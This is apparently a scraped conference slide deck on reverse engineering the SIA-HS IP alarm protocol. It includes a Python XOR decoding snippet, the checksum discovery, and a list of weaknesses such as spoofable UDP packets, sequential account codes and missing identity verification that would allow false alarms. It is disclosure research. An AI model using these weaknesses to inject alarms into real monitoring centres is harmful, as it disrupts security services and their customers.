Cracking the SIA-HS IP alarm protocol
Cracking the SIA-HS IP alarm protocol
Cracking the SIA-HS IP alarm protocol
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
<strong>Cracking</strong> <strong>the</strong> <strong>SIA</strong>-<strong>HS</strong> <strong>IP</strong> <strong>alarm</strong><br />
<strong>protocol</strong><br />
“... <strong>IP</strong> <strong>protocol</strong> fitted with text in a data format with dynamic data encryption<br />
which makes it impossible to decipher <strong>the</strong> message.”<br />
--- Alphatronics Product Catalog<br />
Wilco Baan Hofman
<strong>SIA</strong>-<strong>HS</strong><br />
● Alarm dialer basics<br />
● Protocols<br />
● Wireshark traces<br />
● My implementation for bitlair<br />
● Weaknesses<br />
● <strong>SIA</strong>-<strong>HS</strong><br />
● O<strong>the</strong>r <strong>protocol</strong>s<br />
● Summary
Alarm dialer basics<br />
● ATE: Alarm Transmit Equipment<br />
● ARC: Alarm Receiving Centre<br />
● PROM: Unique account code for a building<br />
● ATE sends <strong>alarm</strong>s, ARC sends ACKs<br />
● <strong>SIA</strong> codes<br />
● BA: Burglary Alarm, BR Burglary restore, etc
Protocols<br />
● Legacy/Analog:<br />
● ANSI <strong>SIA</strong><br />
● ANSI X/<strong>SIA</strong><br />
● Ademco ContactID<br />
● <strong>IP</strong>:<br />
● <strong>SIA</strong>-<strong>HS</strong> (Alphatronics proprietary)<br />
● Vebon Sec<strong>IP</strong> (Proposed Dutch standard)<br />
● ANSI/<strong>SIA</strong> <strong>IP</strong> DC-09 (USA standard)<br />
● VDS 2465-S2 (German standard)
Wireshark
XOR 0xB6?<br />
#!/usr/bin/env python<br />
bytes =<br />
bytearray("000000340101c5fff7f5eefa96879881b6b6b6b6b6a4e3b79ab7b6b6b6b<br />
6b6b6b6b6e4f3f1ffe5e2e4f7e2fff9f896e4f3e7e3f3e5e226fd".decode('hex_cod<br />
ec'))<br />
for i in range(len(bytes)):<br />
bytes[i] ^= 0xB6<br />
print bytes<br />
print bytes.encode('hex_codec')
Why? Yes!<br />
sIACXL 1.7
But wait..
XOR 0x85?<br />
● Yes indeed:<br />
DŽRC<strong>IP</strong>v2.4UREGISTRATION RENEWAL AT PORT 04008o 858585c7
Recap<br />
● So we have:<br />
● UnXORed packet length<br />
● Device name<br />
● Decimal PROM number encoded as if it were hex<br />
● Message<br />
● Checksum? Oh boy
The checksum<br />
● My nightmares contained checksums..<br />
● I tried every known CRC-10 to CRC-16 algorithm<br />
● Different preseed values<br />
● But wait..<br />
● longer packets give generally higher checksums<br />
– … Must be multiplication or addition<br />
● OMFG? Really!? 16-bit sum of all preceeding bytes<br />
● D'OH!
My implementation<br />
● Full <strong>SIA</strong>-<strong>HS</strong> ARC implementation<br />
● Pluggable handlers:<br />
● Database event logging<br />
● JSONBOT IRC Event notification<br />
● Prepared for more <strong>protocol</strong>s<br />
● Started with Vebon Sec<strong>IP</strong>
Weaknesses<br />
● Protocol security requires at least <strong>the</strong>se 3<br />
things:<br />
● Protection from packet injection<br />
● Strong cipher<br />
● Identity verification
<strong>SIA</strong>-<strong>HS</strong><br />
● No identity verification<br />
● No real sessions!<br />
● Predictable interaction between ARC and ATE<br />
● UDP packet's source easy to spoof<br />
● Predictable PROM codes<br />
● Sequential, True for all <strong>protocol</strong>s<br />
● I can trigger <strong>alarm</strong>s for ALL of <strong>the</strong> ARC's<br />
customers without revealing my own <strong>IP</strong>
O<strong>the</strong>r <strong>protocol</strong>s<br />
● Vebon Sec<strong>IP</strong><br />
● Uses RSA+AES<br />
● But public key is transferred every session<br />
● No identity verification (MitM!)
Summary<br />
● Code on github: http://github.com/bitlair/siahsd<br />
● Ask me for more specs on o<strong>the</strong>r <strong>protocol</strong>s!<br />
● Give me more dialers with different <strong>protocol</strong>s!
Thank you<br />
● Please check out o<strong>the</strong>r projects I'm working on<br />
● Spacefed → Will be presented later today :-)<br />
● Bitlair → Hackerspace Amersfoort<br />
● OHM2013 → The next big Dutch hacker camp